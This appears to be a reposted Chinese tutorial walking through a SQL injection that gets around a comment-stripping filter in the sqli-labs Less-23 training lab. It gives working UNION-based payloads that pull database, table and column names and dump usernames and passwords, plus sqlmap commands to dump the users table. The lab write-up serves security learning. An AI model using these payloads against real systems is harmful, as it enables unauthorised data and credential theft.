MySQL注入 绕过去除注释符
Posted 山川绿水
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了MySQL注入 绕过去除注释符相关的知识,希望对你有一定的参考价值。
mysql注入 绕过去除注释符
1.MySQL中的注释符
注释符的作用:用于标记某段代码的作用,起到对代码功能的说明作用,但是注释掉的内容不会被执行。
MySQL中的注释符:
1.单行注释:--+或--空格或#
2.对行注释:/*多行注释内容*/
对于正常的SQL语句中,注释符起到说明作用的功能。但是对于在利用SQL注入漏洞过程中,注释符起到闭合单引号、多引号、双引号、单括号、多括号的功能。
2.去除注释符的代码分析
preg_replace(mixed $pattern,mixed $replacement,mixed $subject):执行一个正则表达式的搜索和替换。
$pattern:要搜索的模式,可以是字符串或一个字符串数组
$replacement:用于替换的字符串或字符串组。
$subject:要搜索替换的目标字符串或字符串数组
可以看出上述将#和--过滤了
3.绕过去除注释符的SQL注入
以sqli-lab-less23为例
1.我们可以执行?id=1
2.我们使用?id=1\\进行探测
3.发现多了一个单引号,但是当我们使用--+或#注释后面的单引号时,发现--+和#已经失效
使用万能注入模板,进行探测
' or '1'='1
4.爆破数据库
-1' union select 1,database(),'3
5.爆破数据表
-1' union select 1,(select group_concat(table_name) from information_schema.tables where table_schema=database()),'1
6.爆破字段名
-1' union select 1,(select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'),'1
7.获取字段内容
-1' union select 1,(select group_concat(username,password) from users),'1
4.Sqlmap安全检测
1.爆破数据库
python2 sqlmap.py -u "" --dbs --batch
2.爆破数据表名
python2 sqlmap.py -u "http://localhost/sqli-labs-master/Less-23/?id=1" -D security --tables
3.爆破字段名及其内容
python2 sqlmap.py -u "http://localhost/sqli-labs-master/Less-23/?id=1" -D security -T users --dump
以上是关于MySQL注入 绕过去除注释符的主要内容,如果未能解决你的问题,请参考以下文章